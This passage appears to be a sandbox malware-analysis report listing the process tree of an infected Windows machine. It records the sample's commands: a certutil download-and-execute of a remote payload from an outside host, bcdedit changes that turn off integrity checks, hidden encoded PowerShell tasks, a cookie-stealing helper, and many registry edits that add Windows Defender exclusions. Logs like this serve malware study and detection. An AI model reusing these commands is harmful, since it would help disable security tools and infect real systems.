-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F20⤵PID:15140
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F20⤵PID:6364
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"20⤵PID:4604
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER21⤵
- Modifies boot configuration data using bcdedit
PID:5796 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:21⤵
- Modifies boot configuration data using bcdedit
PID:17824 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:21⤵
- Modifies boot configuration data using bcdedit
PID:5956 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows21⤵
- Modifies boot configuration data using bcdedit
PID:6684 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe21⤵
- Modifies boot configuration data using bcdedit
PID:5804 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe21⤵
- Modifies boot configuration data using bcdedit
PID:6748 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 021⤵
- Modifies boot configuration data using bcdedit
PID:6124 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn21⤵
- Modifies boot configuration data using bcdedit
PID:6956 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 121⤵
- Modifies boot configuration data using bcdedit
PID:5236 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}21⤵
- Modifies boot configuration data using bcdedit
PID:7556 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast21⤵
- Modifies boot configuration data using bcdedit
PID:5440 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 021⤵
- Modifies boot configuration data using bcdedit
PID:9296 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}21⤵
- Modifies boot configuration data using bcdedit
PID:16288 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy21⤵
- Modifies boot configuration data using bcdedit
PID:5140 -
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v20⤵
- Modifies boot configuration data using bcdedit
PID:10572 -
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe20⤵PID:12548
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"20⤵PID:13468
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)21⤵PID:12736
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)22⤵PID:13508
-
C:\Users\Admin\AppData\Local\Temp\38GAPD8T1J\setups.exe"C:\Users\Admin\AppData\Local\Temp\38GAPD8T1J\setups.exe" ll13⤵
- Executes dropped EXE
PID:16844 -
C:\Users\Admin\AppData\Local\Temp\is-DO459.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-DO459.tmp\setups.tmp" /SL5="$1030A,549376,61440,C:\Users\Admin\AppData\Local\Temp\38GAPD8T1J\setups.exe" ll14⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:17020 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cixtam1z.ikw\setup.exe /S /kr /site_id=754 & exit11⤵PID:16724
-
C:\Users\Admin\AppData\Local\Temp\cixtam1z.ikw\setup.exeC:\Users\Admin\AppData\Local\Temp\cixtam1z.ikw\setup.exe /S /kr /site_id=75412⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:16916 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵PID:17308
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵PID:17416
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵PID:17552
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵PID:17716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYJNKHBsp" /SC once /ST 01:12:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵PID:17964
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYJNKHBsp"13⤵PID:18092
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYJNKHBsp"13⤵PID:5004
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\dDjbdwc.exe\" nh /site_id 754 /S" /V1 /F13⤵
- Drops file in Windows directory
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-IS7LT.tmp\hjjgaa.exe" /Verysilent5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:17608 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:17772 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:3212 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:12052
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:17456
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:17532
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:18160
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4328
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:18200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:18428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5748
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6624
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:6736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7476
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7688
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:9932 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{03986844-9591-3046-a66d-c15c7a0fe008}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:9976 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵PID:10080
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:10144
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:10148
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:12404
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9980
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:10016 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\dDjbdwc.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\dDjbdwc.exe nh /site_id 754 /S1⤵PID:10120
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"2⤵
- Modifies data under HKEY_USERS
PID:10516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:11488
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:11764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:12388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:12584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:13012
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:13148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:13304
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:13512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:11076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:12900
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:11056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:13688
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:13812
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:13916
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:14044
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:14088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:14164
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:14252
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:14292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:14392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:14472
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzJsMnpmYIHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JDaUpqLWU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MCoLVEAxuDhpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MMWqmhiAcXveJYezuLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hxLIpSuPLJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yjiDqdgnMIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pJxacTbbSlizmPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\svZsuFgRAiSlE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZKIEJJPSRIlthXTT\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:7848
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:323⤵PID:15248
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:324⤵PID:15276
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzJsMnpmYIHU2" /t REG_DWORD /d 0 /reg:643⤵PID:15900
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:323⤵PID:15324
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JDaUpqLWU" /t REG_DWORD /d 0 /reg:643⤵PID:16344
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MCoLVEAxuDhpC" /t REG_DWORD /d 0 /reg:323⤵PID:16392
-
